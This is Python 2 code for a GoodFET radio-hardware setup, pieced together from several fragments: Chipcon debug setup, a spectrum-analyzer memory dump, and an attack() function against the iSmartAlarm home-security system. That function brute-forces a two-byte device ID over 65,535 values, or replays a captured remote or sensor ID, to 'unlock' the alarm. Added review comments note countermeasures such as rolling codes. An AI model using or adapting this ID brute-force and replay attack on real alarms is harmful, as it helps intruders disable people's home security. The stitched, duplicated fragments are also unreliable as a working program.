from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time

# Named sleep intervals, all expressed in seconds.
sshsi = 1       # 1 second
shsi = 10       # 10 seconds
mdsi = 60       # 1 minute
lgsi = 120      # 2 minutes
xlgsi = 1200    # 20 minutes

# Bring up the GoodFET Chipcon client: serial link first, then the
# debug session with the target.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Halt and immediately release the CPU so that a target left halted by
# an earlier failed run starts executing again.
client.CChaltcpu()
client.CCreleasecpu()

# Channel number -> approximate centre frequency in MHz.
# Channels run from 0 (902 MHz) to 52 (928 MHz) in 0.5 MHz steps; channel 0
# counts, hence 53 entries.
max_chan = 53
chan_dict = {chan: 902 + (chan * .5) for chan in range(max_chan)}

# Addresses of the two per-channel tables in the target's data memory.
# The 1-byte-per-channel table starts right after the 6-byte-per-channel
# one: 53 * 6 == 0x13E.
chan_data_start = 0xF000    # 53 channels x 6 bytes
chan_min_start = 0xF13E     # 53 channels x 1 byte
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.

import sys

# NOTE(review): hard-coded, user-specific search path. Whoever can write to
# this directory decides which GoodFETCC module gets imported; installing
# the client package (or setting PYTHONPATH) is the more portable choice.
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time

# Open the serial link and start the debug session with the target.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

bytescount = 8 * 132    # 1056 bytes, printed as 132 rows of 8
bytestart = 0xf000      # first data-memory address that is read

while True:
    time.sleep(1)
    # NOTE(review): the CPU is halted on every pass and no CCreleasecpu()
    # call appears in this excerpt; confirm the target is resumed elsewhere.
    client.CChaltcpu()

    # Collect the formatted bytes and join once, instead of growing a
    # string one byte at a time.
    cells = []
    for index in range(bytescount):
        cells.append(" %02x" % client.CCpeekdatabyte(bytestart + index))
        if index % 8 == 7:
            cells.append("\n")

    print("".join(cells))
    sys.stdout.flush()
def attack(attack_type):
    """Flash a 16-byte ID record to the target through the GoodFET and pulse the Arduino.

    attack_type selects the mode:
      '0'   -- enumerate the two-byte field at bytes 13..14 of the ID
               (counter values 1..65535), flashing and triggering once per value.
      '2'   -- use the previously captured module-level ``src_id`` and wait for
               the operator to press ENTER before flashing.
      other -- use ``src_id`` after sleeping ``args.delay`` seconds.

    Every path ends in exit_clean(); nothing is returned.

    Defensive reading: both modes depend on the receiver accepting a short,
    static identifier. NOTE(review): presumably a rolling code or
    challenge-response scheme, together with lock-out after repeated invalid
    IDs, would defeat them -- confirm against the device's protocol.

    NOTE(review): Python 2 only (print statements, ``except Exception, e``,
    raw_input). The locals ``id`` and ``bytes`` shadow builtins.
    """
    try:
        global ser
        global args
        # Value handed to serialpoke() after each flash.
        byte = '1'
        # Initialise the GoodFET serial port connection.
        client = GoodFETCC()
        client.serInit()
        # Connect to the GoodFET.
        client.setup()
        # start() is repeated on purpose; the original author attributes this
        # to poor JTAG latching.
        client.start()
        client.start()
        client.start()
        client.start()
        # Open the serial pipe to the Arduino. timeout=0 makes reads
        # non-blocking. The handle is stored in the global ``ser`` and is not
        # closed in this function -- presumably exit_clean() does; verify.
        ser = serial.Serial(args.port, 9600, timeout=0)
        if attack_type == '0':
            clearscreen()
            # 16-byte template; bytes 13..14 are overwritten on every pass.
            id = 'FFFFFFFFFFFFFF0000000000070000FF'
            bytes = bytearray.fromhex(id)
            counter = 0
            #38520  (original author's note; its meaning is not stated here)
            while True:
                if counter == 65535:
                    break
                counter += 1
                # offset() is defined elsewhere; presumably it returns the
                # counter as four hex digits -- TODO confirm.
                bytes[13:15] = unhexlify(offset(counter))
                # data() is defined elsewhere; presumably it builds an Intel
                # HEX data record at address 32752 (0x7FF0). The appended
                # ':00000001FF' is the Intel HEX end-of-file record.
                f = StringIO(data(32752, bytes) + '\n:00000001FF')
                print pink("IHEX:\n" + f.getvalue() + '\n')
                client.flash(f)
                f.close()
                # Order and delays below are hardware timing: stop the debug
                # session, wait, signal the Arduino, wait, then restart for
                # the next pass.
                client.stop()
                sleep(2.5)
                serialpoke(byte)
                sleep(0.6)
                client.start()
            print green(
                "[SUCCESS] All 65536 ID's have been exhausted, good day.")
            exit_clean()
        else:
            # src_id is filled in elsewhere, before this function is called.
            global src_id
            print green(
                "[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n"
            )
            # bytearray.fromhex() raises ValueError if src_id is not an even
            # number of hex digits; that lands in the handler below.
            id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF'
            bytes = bytearray.fromhex(id)
            if attack_type == '2':
                raw_input('Press [ENTER] when ready to unlock:')
            else:
                print yellowbold(
                    "[INFO] Delay mode enabled. Waiting %i seconds till unlock"
                    % args.delay)
                sleep(args.delay)
            # Same flash-and-trigger sequence as above, run once.
            f = StringIO(data(32752, bytes) + '\n:00000001FF')
            print pink("IHEX:\n" + f.getvalue() + '\n')
            client.flash(f)
            f.close()
            client.stop()
            sleep(2.5)
            serialpoke(byte)
            sleep(0.6)
            print green("[SUCCESS] Hopefully unlocked :D")
            exit_clean()
    # Catch-all: any failure (serial, flashing, hex parsing) is printed and
    # the program exits through exit_clean().
    except Exception, e:
        print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e)
        exit_clean()